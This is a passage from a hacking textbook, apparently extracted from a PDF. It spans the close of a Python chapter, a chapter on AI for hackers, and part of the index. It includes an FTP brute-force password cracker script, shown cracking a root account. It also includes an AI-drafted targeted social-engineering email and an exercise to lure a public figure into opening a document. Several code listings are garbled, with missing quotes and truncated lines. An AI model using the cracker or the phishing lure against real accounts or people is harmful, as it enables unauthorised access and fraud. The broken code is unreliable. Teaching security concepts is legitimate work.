Note that the script has found port 21 open with vsFTPd 2.3.4 running on it,
port 22 open with OpenSSH 4.7 running on it, port 25 with Postfix, and port
3306 with MySQL 5.0.51a.
We have just successfully built a multiport banner-grabbing tool in Python
to perform reconnaissance on a target system. The tool tells us which
service is running on the port and the version of that service! This is key
information a hacker needs before proceeding with an attack.
Exceptions and Password Crackers
Any code you write will be at risk of errors or exceptions. In programming
terms, an exception is anything that disrupts the normal flow of your code
—usually an error caused by incorrect code or input. To deal with possible
errors, we use exception handling, which is simply code that handles a
particular problem, presents an error message, or even uses an exception for
decision making. In Python, we have the try/except structure to handle these
errors or exceptions.

A try block tries to execute some code, and if an error occurs, the except
statement handles that error. In some cases, we can use the try/except
structure for decision-making, similar to if...else. For instance, we can use
try/except in a password cracker to try a password and, if an error occurs
due to the password not matching, move to the next password with the
except statement. Let’s try that now.
Enter the code in Listing 17-7 and save it as ftpcracker.py; we’ll go through
it in a moment. This script asks the user for the FTP server number and the
username of whichever FTP account they want to crack. It then reads in an
external text file containing a list of possible passwords and tries each one
in an effort to crack into the FTP account. The script does this until it either
succeeds or runs out of passwords.
   #! /usr/bin/python3
   import ftplib
➊ server = input(FTP Server: ")
➋ user = input("username: ")
➌ Passwordlist = input ("Path to Password List >
➍ try:

with open(Passwordlist, 'r') as pw:
           for word in pw:
            ➎ word = word.strip('\r\n')
            ➏ try:
                  ftp = ftplib.FTP(server)
 
                  ftp.login(user, word)
               ➐ print(Success! The password is 
            ➑ except ftplib.error_perm as exc:
                  print('still trying...', exc)
   except Exception as exc:
       print('Wordlist error: ', exc)
Listing 17-7: FTP password cracker Python script
We’re going to use tools from the ftplib module for the FTP protocol, so
first we import that. Next, we create a variable named server and another
variable named user, which will store some commands for user input. Your

script will prompt the user to enter the IP address of the FTP server ➊ and
the username for the account ➋ the user is trying break into.
Then we ask the user for the path to the password list ➌. You can find
numerous password lists in Kali Linux by entering locate wordlist in a
terminal.
We then begin the try ➍ block of code that will use the password list
provided by the user to attempt to crack the password for the username
supplied by the user.
Note that we use a new Python function called strip() ➎. This function
removes all the leading and trailing characters of a string (in this case, from
the word). This is necessary because iterating over the lines in this list will
leave the newline characters ('\n' and '\r') at the end of the word. The
strip() function removes these and leaves just the string of characters of the
potential password. If we don’t strip the newline characters, we will get a
false negative.
Then, we use a second try ➏ block. Here, we use the ftplib module to first
connect to the server using the IP address the user supplied and then try the
next password from the password list on that account.
If the combination of the username and password results in an error, the
block exits and goes to the except clause ➑, where it prints still trying and

the text of the login error exception. Then, it returns to the top of the for
clause and grabs the next password from the password list to try.
If the combination succeeds, the successful password is printed to the
screen ➐. The final line picks up any other situations that would otherwise
result in errors and displays them. An example would be if the user input
something the program couldn’t process, such as a bad path to the word list
or a missing word list.
Now, let’s run this script against the FTP server at 192.168.1.101 and see
whether we can crack the password of the root user. I am using a password
list named bigpasswordlist.txt in my working directory. You may need to
provide the entire path to whichever password list you are using if it is not
in your working directory (for example, /usr/share/bigpasswordlist.txt).
kali> ./ftpcracker.py
FTP Server: 192.168.1.101
username: root
Path to PasswordList > bigpasswordlist.txt
still trying...
still trying...
still trying...
--snip--

Success! The password is toor
As you can see, ftpcracker.py successfully found the password for the user
root and presented it onscreen.
Summary
To graduate beyond script-kiddie status, a hacker must master a scripting
language, and Python is generally a good first choice for its versatility and
relatively small learning curve. The majority of hacking tools are written in
Python, including sqlmap, scapy, and many others. Here, you have learned
some Python fundamentals you can use to build some useful, yet simple
hacker tools, including a banner grabber and an FTP password cracker. To
learn more Python, I strongly recommend No Starch Press’s excellent book
Automate the Boring Stuff with Python by Al Sweigart.
Exercises
1. Build the SSH banner-grabbing tool from Listing 17-5 and then edit it to
do a banner grab on port 21.
2. Rather than hardcoding the IP address into the script, edit your banner-
grabbing tool so that it prompts the user for the IP address.
3. Edit your tcp_server.py to prompt the user for the port to listen on.

4. Build the FTPcracker in Listing 17-7 and then edit it to use a word list
for user variables (similar what we did with the password) rather than
prompting the user for input.
5. Add an except clause to the banner-grabbing tool that prints “no answer”
if the port is closed.
OceanofPDF.com

18
ARTIFICIAL INTELLIGENCE FOR
HACKERS

As you know, we’re on the brink of an artificial intelligence revolution!
Artificial intelligence is growing by leaps and bounds, and it’s beginning to
integrate into our everyday lives and cybersecurity in various ways. AI will
likely change our lives and our work in ways that are hard to anticipate.
Do not fret, I can tell you one thing with certainty: AI will not make
cybersecurity engineers obsolete. Artificial intelligence will make you
better at your job if you embrace it and learn to use it properly and
efficiently.
Here are a few reasons AI will not replace all cybersecurity professionals:
AI Augments Rather Than Replaces Cybersecurity Roles
AI can automate certain routine tasks and enhance threat detection
capabilities, but it can’t fully replace the critical thinking, creativity, and
decision-making skills of human cybersecurity professionals. AI lacks
the intuition, context understanding, and ability to devise the innovative
solutions that are essential in cybersecurity.
AI Has Limitations
AI algorithms are trained on existing data and may struggle to detect
new or sophisticated cyber threats that haven’t been seen before. Cyber-
criminals can create attacks designed to bypass AI systems, necessitating
human intervention and ingenuity to respond effectively. In this
circumstance, AI will necessitate additional, well-trained cybersecurity
professionals.

Cybersecurity Requires Human Expertise
Cybersecurity is an ever-evolving field that demands continuous
learning (see the Hackers-Arise Lifetime training program), adaptation,
and ethical decision-making. While AI can assist in automating tasks, it
can’t replace the human expertise required to understand the context,
evaluate the effectiveness of security measures, and make decisions
based on legal and ethical considerations (see the Hackers-Arise
Criminal Law for Cybersecurity Professionals training program).
New Roles Will Emerge
As AI becomes more prevalent in cybersecurity, new roles and
specializations will emerge, such as AI security analysts, machine
learning security engineers, and professionals responsible for
developing, training, implementing, and securing AI systems. These
roles will complement and work alongside traditional cybersecurity
roles. These positions will likely have even higher salaries than the
traditional cybersecurity engineers.
Collaboration Is Key
The most effective approach to leveraging AI revolution in cybersecurity
will be the collaboration between AI and human cybersecurity
professionals. AI can augment human capabilities by automating routine
tasks, enabling professionals to focus on more complex and strategic
aspects of cybersecurity. Humans will oversee and guide AI systems to
ensure ethical and effective cybersecurity practices.

While AI will transform and enhance various aspects of cybersecurity, it’s
highly unlikely to make human cybersecurity engineers obsolete in the next
5 to 10 years. The dynamic nature of cyber threats, the limitations of AI,
and the need for human expertise and ethical decision-making will ensure
that cybersecurity remains a field that requires skilled professionals
working in tandem with AI technologies.
Major Players in AI
Although the field is advancing rapidly, the first mass-market commercial-
level AI, ChatGPT, was introduced in November 2022 from OpenAI. Since
then, many companies have developed and released their own unique AI
models, including:
Copilot from Microsoft
Grok from X (formerly Twitter)
Gemini from Google
Perplexity from Perplexity AI
Claude 2 by Anthropic
Llama 2 from Meta
Using AI in Cybersecurity
As I mentioned, there are several ways that a cybersecurity professional can
leverage AI in their job. For instance, one of the key tasks in cybersecurity

is known as cyber threat intelligence, which is the practice of staying
abreast of the latest threats in cybersecurity. To do just that, for example, I
could ask my favorite AI, “What are the latest threats in cybersecurity?” It
might answer:
Ransomware attacks: These continue to be a major threat, with
cybercriminals encrypting data and demanding payment for
decryption keys.
Cloud vulnerabilities: As more organizations rely on cloud services,
securing cloud environments has become critical. Cloud
vulnerabilities have increased 150% in the last five years.
Mobile device vulnerabilities: With increased remote work and
BYOD policies, mobile devices are increasingly targeted by
cybercriminals.
AI-powered attacks: Cybercriminals are leveraging AI and machine
learning to develop more sophisticated attacks and evade detection.
Social engineering and phishing: These remain prevalent, with 85%
of data breaches involving human interaction.
IoT device vulnerabilities: As IoT adoption grows, so do the security
risks associated with these often poorly secured devices.

Supply chain attacks: Compromising software or hardware before it
reaches the consumer is an increasing concern.
Insider threats: Both accidental and malicious insider threats
continue to pose significant risks.
Advanced persistent threats (APTs): These stealthy, long-term
attacks aimed at specific targets are becoming more common.
Cryptocurrency-related attacks: As cryptocurrencies gain popularity,
attacks targeting these digital assets are on the rise.
In this way, I can stay ahead of potential threats to my organization.
In addition, I could be even more specific and ask my favorite AI, “What
are the latest ransomware threats?” It might answer:
LockBit: This remains one of the most active and dangerous
ransomware groups, despite recent law enforcement disruptions. They
continue to evolve their tactics and target a wide range of
organizations.
RansomHub: This group emerged suddenly in 2024, possibly as a
reincarnation of the AlphV/BlackCat group. They quickly became one
of the most active ransomware threats.

Akira: This ransomware group has risen to prominence, becoming
one of the top threats in 2024.
Play: A relatively new Linux version of this ransomware has been
observed, expanding its potential target base.
Cactus: This group has been responsible for high-profile attacks,
including one on a Swedish supermarket chain.
Medusa: They’ve been active in targeting various sectors, including
public institutions.
8Base: This group has claimed responsibility for attacks on several
organizations, including the United Nations Development
Programme.
Daixin Team: They’ve been involved in attacks on healthcare
providers, claiming to have stolen large amounts of patient data.
Social Engineering Attacks with AI
Over 80 percent of all successful cyberattacks include an element of social
engineering. Social engineering relies upon manipulating human
vulnerabilities rather than technical vulnerabilities. Tactics like phishing,
email impersonation, and pretexting are becoming increasingly
sophisticated and prevalent. For instance, ransomware attacks, presently the

most successful financial attacks, usually begin with someone within the
targeted organization opening a file or clicking a link. This simple action
gives that attacker an opening into the organization, allowing them to
encrypt all the data in the organization, which leads to the crippling of the
organization. Eventually, the company must pay the ransom to get its data
back.
In the initial phases of AI in cybersecurity, attackers will likely focus on
using AI to craft email messages that entice their targets to click a link or
open a document. Writing email may be one of the best uses for artificial
intelligence for hackers right now, as AI can gather the key information and
draft an excellent and effective email to the intended targets.
Let’s ask our favorite AI to write an email to OccupyTheWeb to purchase
the translation rights to the video companion to this book (this is a real-life
social engineering attack where I was a target). The key is that AI can write
email messages that are highly targeted and tailored to the individual
recipient. Here’s its draft:
Subject: Offer to Purchase Rights to “Linux Basics for Hackers”
training videos
Dear OccupyTheWeb Team,
I am writing to express my strong interest in acquiring the full rights
and ownership of your popular “Linux Basics for Hackers” online

book. As an experienced cybersecurity professional and educator, I
have followed your work closely and been extremely impressed by the
quality and depth of content in this Linux fundamentals course
tailored for ethical hackers. The hands-on virtual machine labs,
comprehensive video lessons, and real-world examples make this one
of the best resources available for mastering Linux from an offensive
security perspective. I believe that under my ownership, I can invest
in expanding and updating this course to ensure it remains the
industry-leading program for this topic. My team and I have extensive
experience developing and marketing online cybersecurity training,
and we have the resources to translate this course into multiple
languages to greatly increase its reach globally. I would be willing to
pay a competitive one-time fee to purchase the permanent full rights,
or potentially explore a revenue share model if you prefer. Of course,
I am open to discussing any terms or conditions you may have as
well. The “Linux Basics for Hackers” course is a fantastic product
that deserves more exposure and growth, which I feel I could provide
with my resources and industry expertise. Please let me know if you
would be interested in further discussing a sale or potential
partnership. Thank you for your consideration. I look forward to
hearing from you.
Sincerely,
[Your Name]

As you can see, this is a very professional and convincing email in contrast
to the typical badly spelled and grammatically lacking “Nigerian Prince”
email we have all received. This message is not only well written but also
incorporates information gained from open source internet sources about
the target and the subject.
Using AI to Write a Bash Script
In Chapter 8, we looked at some basics of bash scripting. Bash scripting can
make your life so much more efficient, as you can write a small script to do
repetitive tasks that a machine does much better. You also can use AI to
write these scripts, even if your scripting skills are limited.
For instance, let’s ask our favorite AI application to write a script to use a
cron job to back up our data every Saturday night at 11:30 PM (presumably
when no one is on the network). Backing up your data is your best
prevention from the damage done by ransomware. Here’s the script:
#!/bin/bash
# Set the source directory to backup
SOURCE_DIR="/path/to/your/data"
# Set the backup destination
BACKUP_DIR="/path/to/backup/location"

# Create a timestamp for the backup file
TIMESTAMP=$(date +"%Y%m%d_%H%M%S")
# Set the backup filename
BACKUP_FILE="backup_${TIMESTAMP}.tar.gz"
# Create the backup directory if it doesn't exist
mkdir -p "$BACKUP_DIR"
# Create the backup
tar -czf "${BACKUP_DIR}/${BACKUP_FILE}" "$SOURCE_
# Optional: Remove backups older than 30 days
find "$BACKUP_DIR" -name "backup_*.tar.gz" -mtime
# Optional: Log the backup operation
echo "Backup completed on $(date)" >> "${BACKUP_D
The AI then goes on to remind us to change the permissions:
chmod +x /path/to/backup_script.sh
then edit our cron table
crontab -e
30 23 * * 6 /path/to/backup_script.sh

Now, we should be able to back up our system automatically. Isn’t AI
wonderful?
Summary
Our digital world continues to evolve with new and better applications and
devices. Artificial intelligence is another advance along this long road. Just
as businesses that refused to use email or build websites have disappeared
into the dustbin of history, you must adapt and embrace this new
technology. It can make you so much better at what you do!
Exercises
1. Sign up for one of the free accounts on the major AI platforms.
2. Create a social engineering letter to a major public figure that gets them
to engage with you or open a document.
3. Use an AI platform to write the bash port-scanning script from Chapter
8. Did it work? If not, why not?
4. Parts of the chapter were written by AI. Can you tell which parts? Write
me at occupytheweb@protonmail.com with your guess, and I’ll let you
know if you are right.
OceanofPDF.com

INDEX
Page numbers referring to figures or tables are italicized.
Symbols
& (ampersand), 68
= (assignment symbol), 79
* (asterisk), 173
: (colon), 78, 194
$ (content symbol), 78–79, 87, 91
- (dash), 19–20, 52, 62, 173, 175
-- (double dash), 7
.. (double dots), 6
>> (double redirect symbol), 13
# (hash mark), 84–85, 186
./ notation, 85–86, 185
| (pipe), 12. See also piping
> (redirect symbol), 13, 35, 89
; (semicolon), 131, 133
#! (shebang), 84, 86
A

accept method, 192
access lists, 127
access points. See APs
admin account. See root account
Advanced Packaging Tool. See apt
AI (artificial intelligence), 201–207
augmentation and creation of cybersecurity roles, 202–203
collaboration with, 202–203
limitations of, 202
major players in, 203
social engineering attacks with, 205–206
using in cybersecurity, 203–204
writing bash scripts with, 206–207
aircrack-ng suite and aircrack-ng command, 7–10, 30, 155–157
aireplay-ng command, 157
airmon-ng command, 156
airodump-ng command, 156–157
Akira, 204
Aloha POS (Point of Sale) system, 88
ampersand (&), 68
anonymity, 137–149
email encryption, 148–149
proxy servers, 141–147
adding proxies, 145

dynamic chaining, 145
random chaining, 146
running traffic through, 141–142
security concerns, 147
setting proxies in config files, 142–144
Tor system, 139–141
Ahmia search engine, 141, 141
dark web, 140–141
encrypted traffic data, 139–140
installing Tor browser, 140, 140
security concerns, 141
tracking methods, 138
VPNs, 147–148
Anthropic, 203
Apache, 123–127
creating HTTP servers with, 124–127
adding HTML blocks, 126
editing the index.html file, 125–126
finished product, 126–127
default web page, 125, 125
downloading and installing, 124
LAMP, 125
logs
deleting, 118

viewing, 116
running, 125
APs (access points), 152–158
connecting to, 154–155
cracking, 155–157
viewing, 153–154
apt (Advanced Packaging Tool), 40–43
adding software, 40–41
removing software, 41–42
searching for packages, 40
updating packages, 42
upgrading packages, 42–43
apt command, 40–42
GUI-based software installers, 45–46
installing software, 40–41
removing software, 41
searching for packages, 40
updating packages, 42
upgrading packages, 42
APTs (advanced persistent threats), 204
archiving, 100–101
bit-by-bit or physical copies, 100–101
tarring files together, 96–98
ARM architecture, downloading Kali Linux for, xxviii

arrays, 188, 194
artificial intelligence. See AI
assignment symbol (=), 79
asterisk (*), 173
-a switch
ls command, 7
modprobe command, 168
netstat command, 29, 29, 30
at command, 69, 69
at daemon (atd), 69
ATT Protocol (Low Energy Attribute Protocol), 161
aux switch, 12, 62–63
B
bad blocks, 110
banner grabbing, 191–192, 196–197
bash shell (Bourne-again shell), xx, 2, 81–93
changing default shell to, 72–73, 82–83
common built-in commands, 92
open port scanning script, 87–91
flexible version, 90–91
local version, 89
target of, 88

simple message script, 84–87
adding functionality, 86–87
commenting, 84–85
running, 85–86
setting execute permissions, 85
using AI for scripting, 206–207
basic service set identifier (BSSID), 152, 154–158
Berkeley Internet Name Domain (BIND), 34
bg command, 68, 92
binaries
adding to PATH variable, 79
defined, 2
directories for, 4, 4
finding
whereis command, 9
which command, 9–10
location of, 2
binary representation of permissions, 53, 53
BIND (Berkeley Internet Name Domain), 34
/bin directory, 4, 4
black hat hackers, 87–88
block devices, 107–108
defined, 107
listing, 107–108

Bluetooth, 158–162
confirming device reachability, 161–162
defined, 158
discoverable mode, 158
kernel module, 168
pairing, 158
scanning for devices, 158–161
BlueZ, 158–162
hciconfig tool, 159
hcidump tool, 159
hcitool tool, 159–160
l2ping command, 161–162
sdptool tool, 160–161
/boot directory, 4
Bourne-again shell. See bash shell
break command, 92
broadcast addresses
changing, 31–32
defined, 28
viewing, 28
bs option, 100
BSSID (basic service set identifier), 152, 154–158
bunzip2 command, 99
Butler, Max (Max Vision), 88

bzip2 command, 98–99
C
Cactus, 204
CardersMarket, 88
case sensitivity, 2, 62
cat command
checking kernel version, 165
creating files, 12–14
filtering text, 21–22
viewing files, 18
cd command, 6, 92
CERN, 149
CERT (Computer Emergency Response Team), 88
channels, 152
character devices, 107
ChatGPT, 203
check command, 156
chgrp command, 51
chmod command, 52, 54–58, 85, 87, 89, 185, 191–192
decimal notation, 54
group permissions, 58
temporary permissions, 57

UGO syntax, 54–55
chown command, 50
classes, 189–190
Claude 2, 203
cloud vulnerabilities, 203
colon (:), 78, 194
commenting, 84–85, 186–187
compress command, 98–99
compression, 95–99
bzip2 command, 98–99
compress command, 98–99
defined, 96
gzip command, 98–99
lossy vs. lossless, 96
tarring files together, 96–98
Computer Emergency Response Team (CERT), 88
connect() function, 191
content symbol ($), 78–79, 87, 91
continue command, 92
control block, 194
control statements, 194–195
if...else structure, 194–195
if structure, 194
Copilot, 203

cp command, 14
CPUs
identifying, xxviii
process management, 62–64
Raspberry Pi, 128
cron daemon (crond), 68–69, 172, 174
crontab file, 172–176
scheduling backup tasks, 174–175
scheduling jobs to run automatically, 172–174
scheduling MySQLscanner, 175–176
shortcuts, 176
cron table (crontab), 172, 172, 173, 175
cross-site scripting (XSS), 124
cryptocurrency-related attacks, 204
-c switch
airodump-ng command, 157
tar command, 97
cyber threat intelligence, 203
D
Daixin Team, 204
dash (-), 19–20, 52, 62, 173, 175
dd command, 100

delete command, 131
deleting
environment variables, 80
logs, 118
denial-of-service (DoS) attacks, 31
describe statement, 134
/dev directory, 4, 104–107
block devices, 107–108
character drevices, 107
logical labels, 105, 105–106
major and minor numbers, 105–106
mount points, 108
partitions, 105–107
USB devices, 108
df command, 109–110
dhclient command, 32–33
DHCP (Dynamic Host Configuration Protocol) servers
assigning new IP addresses from, 32–33
DNS settings, 35
dictionaries, 193–194
dig command, 33–34
directories. See also permissions
changing, 6
creating, 14

defined, 2
identifying current, 5
listing contents of, 6–7
removing, 15
viewing current in shell prompt, 77
disabling logging, 120
dmesg command, 169
DNS (Domain Name System), 32–33, 124
changing servers, 34–35
examining, 33–34
mapping IP addresses, 35–36
dnsspoof tool, 35–36
DoS (denial-of-service) attacks, 31
double dash (--), 7
double dots (..), 6
double redirect symbol (>>), 13
dynamic chaining, 145
Dynamic Host Configuration Protocol servers. See DHCP servers
E
echo command, 84, 86–87, 92
PATH variable, 78–79
prompting for user input, 90

user-defined variables, 79–80
8Base, 204
ejecting (unmounting) devices, 109
email encryption, 148–149
env command, 74
environment variables, 71–80
adding directories to PATH variable, 78–79
case sensitivity, 73
changing default shell to bash, 72–73
changing shell prompt, 76–77
creating user-defined variables, 79–80
defined, 71
deleting, 80
filtering, 75
values
changing for a session, 75
making changes permanent, 76
viewing
all default variables, 74
all variables, 74–75
ESSID (extended service set identifier), 152
/etc directory, 4, 4
ethical hacking. See white hat hacking
Ettercap, 36

eval command, 92
exception handling, 197–199
exec command, 92
exFAT (Extended File Allocation Table), 106–107
exit command, 92
exit() function, 187
export command, 76–77, 92
extended service set identifier (ESSID), 152
F
FAT (File Allocation Table), 107
fd0 drive label, 105
fdisk utility, 106–107
fg command, 68, 92
files. See also permissions
appending content to, 13
archiving, 96–98, 100–101
compressing, 95–99
copying, 14
creating, 12–14
finding, 8–12
numbering lines, 20–21
overwriting, 13–14

removing, 15
renaming, 14–15
viewing
first lines, 18–19
last lines, 19–20
one page and paging down, 23
one page and scrolling or filtering, 24–25
filesystem, 3–4
/bin directory, 4
/dev directory, 104–107
/etc directory, 4
/home directory, 2, 4
/lib directory, 4
/media directory, 4, 108–109
/mnt directory, 4, 108–109
monitoring
checking for errors, 110–111
viewing information about mounted disks, 109–110
navigating
changing directories, 6
identifying current directory, 5
listing directory contents, 6–7
/root directory, 3–4, 103
filtering

environment variables, 75
processes
by name, 63
by resource use, 64
text, 21, 24–25
find command, 10–11, 58
float() function, 187
for loop, 195–196
fsck command, 110–111
-f switch
shred command, 119
tar command, 97
functions in Python, 187–188
G
Gemini, 203
getopts command, 92
g flag, 22–23
git clone command, 47
GitHub, 47
Google
email, 138
Gemini, 203

packet routing, 139
public DNS server, 35
Grand Unified Bootloader (GRUB), xxxv–xxxvi, xxxvi
granular control, xxvi
graphical user interfaces. See GUIs
gray hat hackers, 87
grep command
filtering
for keywords, 11–12, 21, 29–30
by process name, 63
for variables, 75
open port scanner, 89, 91
piping to, 12, 21, 29, 63, 75, 89, 91, 177
Grok, 203
groups
checking permissions, 51–52
defined, 50
granting root user’s group permissions, 58
passing ownership to, 51
GRUB (Grand Unified Bootloader), xxxv–xxxvi, xxxvi
GUIs (graphical user interfaces)
scheduling jobs to run on startup, 178–179
shells vs., 82
software installers, 45–46

gunzip command, 99
gzip command, 98–99
H
Hackers Arise, xxiii
hacking
advantages of Linux for, xxvi–xxvii
black hat, 87–88
ethical, xxv–xxvi
gray hat, 87
importance of, xxiii–xxiv
importance of Linux to, xxiv
white hat, xxv–xxvi, 87
hash mark (#), 84–85, 186
hciconfig tool, 159
hcidump tool, 159
hcitool tool, 159–160
hda drive label, 105
head command, 18–19, 21
--help command, 7–8
help() function, 187
help resources, 7–8
High Performance File System (HPFS), 106–107

HISTSIZE variable, 75–76
/home directory, 2, 4, 4
hosts file, 35–36
-h switch, 7–8
\h value, 77, 133
I
IDEs (integrated development environments), 183
ifconfig command
changing network information, 31–33
network analysis, 28–29
open port scanner, 89
remote spying camera, 128
wireless network analysis, 152–153
if...else structure, 194–195
if structure, 194
init daemon (initd), 176
insert command, 131
insider threats, 204
insmod suite, 167
install keyword, 40–41
integrated development environments (IDEs), 183
intelligence and espionage, xxiii–xxiv, xxvi, 141

int() function, 187
IoT device vulnerabilities, 204
IP addresses
assigning new, 31–33
DoS attacks, 31
mapping, 35–36
tracking methods, 138
ipconfig command, 89
iwconfig command, 30–31, 153, 155
iwlist command, 153–154
J
JetBrain, 183
job scheduling, 171–179
backup tasks, 174–175
MySQLscanner, 175–176
to run automatically, 172–176
to run on startup
GUI, 178–179
rc scripts, 176–178
jobs command, 92
journalctl utility, 114–119
deleting logs, 118

disabling logging, 120
help screen, 115
viewing all logs, 114
kernel logs, 118
viewing events
in last 24 hours, 116–117
by user, 117, 117
viewing logfiles
highest-priority, 116
specific services, 116
journal daemon (journald), 114, 120
K
Kali Linux
desktop, xxxvii, xxxvii
installation
through WSL, xxxvii–xxxviii
on VMs, xxxi, xxxi–xxxii
overview, 2
setup, xxxii–xxxvii
kali-tweaks command, xx, 72–73, 82–83
kernel, 163–170
checking version of, 165

defined, 163–164
loadable kernel modules
confirming module loading, 169
defined, 164
inserting, 167–169
listing installed, 167
managing, 167–169
removing, 167, 169
viewing information about, 168
tuning, 165–167
kill command, 66
-k option, 118
L
l2ping command, 161–162
LAMP (Linux, Apache, MySQL, and PHP), 125
len() function, 187
less command, 24–25
/lib directory, 4, 4
Linux
advantages of, xxvi–xxvii
future, xxvii
granular control, xxvi

hacking tools, xxvi–xxvii
open source, xxvi–xxvii
transparency, xxvi
basic commands, 4–15
checking login, 5
finding items, 8–12
help resources, 7–8
identifying current directory, 5
modifying files and directories, 12–15
navigating filesystem, 6–7
basic concepts, 1–2
distributions, xxvii
filesystem, 3–4
importance of, xxiv
terminal, 2–3
terminology, 1–2
virtual machines, xxviii–xxix
listen() function, 192
listing
block devices, 107–108
contents of directories, 6–7
installed kernel modules, 167
lists in Python, 188
LKMs (loadable kernel modules), 164–169

confirming module loading, 169
defined, 164
inserting modules, 167–169
listing installed modules, 167
managing, 167–169
removing modules, 167, 169
viewing information about, 168
Llama 2, 203
locate command, 9, 198
LockBit, 204
logging system, 113–121. See also journalctl utility
logfiles defined, 113
priorities, 115–116
shredding logs, 118–119
logical labels, 105, 105, 106
long listings, 7
loopback addresses, 28
loops, 195–196
for loop, 195–196
while loop, 195
lossless compression. See compression
lossy compression, 96
Low Energy Attribute Protocol (ATT Protocol), 161
lsblk command, 107–108

ls command
file creation, 14
listing directory contents, 6–7
permissions, 51, 54–55, 85
software installation, 47
lsmod command, 167–169
lsusb command, 108
-l switch
fdisk utility, 106–107
ls command, 7, 14, 51
netstat command, 29
M
MAC (media access control) addresses
defined, 28
spoofing, 32
viewing, 28
wireless networks, 153–155
major and minor numbers, 105–106
man command, 8–9
man-in-the middle (MITM) attacks, 164, 166
manual pages, viewing, 8–9
MariaDB, 130–135

accessing remote database, 133
connecting to database, 133–134
defined, 130
examining data, 135
exploring tables, 134–135
interacting with SQL, 131
logging in, 130–131
open port scanning script, 88–89
popularity of, 130
setting passwords, 131–132
starting, 130–131
masks
network, 28, 31–32
securing default permissions with, 56–57
max() function, 187
media access control addresses. See MAC addresses
/media directory, 4, 4, 108–109
Medusa, 204
Meta, 203
Metasploit, 22
methods, 190, 190
Microsoft
Copilot, 203
Linux vs., xxvi–xxvii

WAMP, 125
Windows Subsystem for Linux, xxxvii
military, xxiii, xxvi
MITM (man-in-the middle) attacks, 164, 166
mkdir command, 14
/mnt directory, 4, 4, 108–109
mobile device vulnerabilities, 203
modinfo command, 168
modprobe command, 167–169
modules
loadable kernel modules, 164–169
in Python, 182–183, 189
monitor mode, 155–156
more command, 23, 74–75
mount command, 109
mounting devices, 104, 108–109
automounting, 108
manually, 109
mount points, 108
unmounting, 109
munging, 22
mv command, 15
MySQL, 130–135
accessing remote database, 133

connecting to database, 133–134
defined, 130
development of, 130
examining data, 135
exploring tables, 134–135
interacting with SQL, 131
logging in, 130–131
open port scanning script, 88–91
popularity of, 130
setting passwords, 131–132
starting, 130–131
N
nameservers, 33–35
National Security Agency (NSA), 141
netstat command, 29–30
network cards
modes, 153, 155–156
viewing information about, 153
network manager, 154
network masks
changing, 31–32
defined, 28

viewing, 28
networks, 27–36
analyzing, 28–29
changing information about, 31–33
assigning new IP addresses, 31–33
changing broadcast addresses, 31–32
changing network masks, 31–32
spoofing MAC addresses, 32
communications in Python, 190–193
TCP clients, 190–192
TCP listeners, 192–193
DNS, 33–36
changing servers, 34–35
examining, 33–34
mapping IP addresses, 35–36
statistics about, 29–30
wireless, 151–162
Bluetooth, 158–162
checking wireless devices, 30–31
Wi-Fi networks, 152–157
New Technology File System (NTFS), 106–107
nice command, 64–66
nl command, 20–21
nmap command, 87–89, 142

nmcli command, 154–155
noerror option, 100
NSA (National Security Agency), 141
ns option, 33
–n switch
nice command, 65
shred command, 119
NTFS (New Technology File System), 106–107
Null-Byte, xxiii
O
octal representation of permissions, 53, 53
Offensive Security, xxvii
Onion Router system, The. See Tor system
ONR (US Office of Naval Research), 139
OOP (object-oriented programming), 189–190
OpenAI, 203
open() function, 187
open source
Linux, xxvi–xxvii
MySQL and MariaDB, 88, 130
OpenSSH
defined, 127

remote spying camera, 127–129
starting, 127
Oracle, 130
P
partitions, 105–107
passwd command, 3
passwords
changing, 3
cracking, 22
with exception handling, 197–199
Wi-Fi AP passwords, 157
Kali Linux, xxxiv, xxxiv
munging, 22
MySQL and MariaDB, 131–132
PATH variable, 9–10
adding directories to, 78–79
identifying directories stored in, 78
mistakes to avoid, 79
penetration testing, xxv
permissions, 49–59
changing, 52–56
with decimal notation, 52, 53–54

giving root execute permission on new tools, 55–56
with UGO syntax, 54–55
checking, 51–52
levels of, 50
passing ownership
to groups, 51
to individual users, 50
setting execute permissions, 85
setting secure default permissions with masks, 56–57
special, 57–59
Perplexity, 203
phishing, 203
PIDs (process IDs), 62–63, 66–68
piping
cat to grep, 21
netstat to grep, 29
nmap to grep, 89, 91
ps to grep, 12, 63, 177
set to grep, 75
set to more, 74
pip package manager, 182–183
Play, 204
print() function, 185, 187–188, 191
privilege escalation, 58

/proc directory, 4
process IDs (PIDs), 62–63, 66–68
process management, 61–69
changing priority, 64–66
killing processes, 66–67
moving processes to foreground, 68
processes defined, 61
running processes in background, 67–68
scheduling processes, 68–69
viewing processes, 62–64
filtering by name, 63
filtering by resource use, 64
promiscuous mode, 31
properties, 190, 190
ProtonMail, 148–149
proxies
adding, 145
defined, 141
free, 143, 144
setting in config files, 142–144
proxy chains, 141
dynamic chaining, 145
random chaining, 146
proxychains command, 142–147

proxy servers, 141–147
adding proxies, 145
dynamic chaining, 145
random chaining, 146
running traffic through, 141–142
security concerns, 147
setting proxies in config files, 142–144
PS1 variable, 77
ps command
adding services, 177–178
confirming process priority, 65
filtering processes by name, 63
viewing process information, 12, 62–63
-p switch
fsck command, 111
journalctl utility, 116
nmap command, 88
purge option, 41–42
pwd command, 5–6, 92
PyCharm, 183
PyPI (Python Package Index), 182
Python scripting, 181–200
comments, 186–187
control statements, 194–195

if...else structure, 194–195
if structure, 194
dictionaries, 193–194
exception handling and password cracking, 197–199
formatting, 184
functions, 187–188
improving, 196–197
lists, 188
loops
for loop, 195–196
while loop, 195
modules, 182–183, 189
network communications, 190
TCP clients, 190–192
TCP listeners, 192–193
object-oriented programming, 189–190
variables, 184–186
Q
-q flag, 117
R
random chaining, 146

range() function, 187
RansomHub, 204
ransomware attacks, 203–205
Raspberry Pi
connecting to peripherals, 128
defined, 127
downloading OS, 128
IP address, 128
logging in, 128
remote spying camera, 127–129
building, 128–129
configuring camera, 129
setting up, 128
spying with, 129
rcconf tool, 178–179
rc scripts, 176–178
read command, 84, 91, 92
readonly command, 92
recv method, 191
redirect symbol (>), 13, 35, 89
relational databases, 131
remove command, 41
renice command, 65–66
repositories

adding to sources.list file, 43–44
categories of, 44
defined, 40, 43
resources, 61
filtering processes by usage, 64
killing processes, 66–67
prioritizing processes, 65–66
rm command, 15
rmdir command, 15
rmmod command, 167
root account
confirming login as, 4–5
defined, 2
permissions, 50, 55–58
root (/) of filesystem vs., 3
/root directory, 3–4, 4, 55–56, 103
rootkits, 164, 169
r permission, 50, 52
rpicam-still application, 129
-r switch
modprobe command, 169
rm command, 15
S

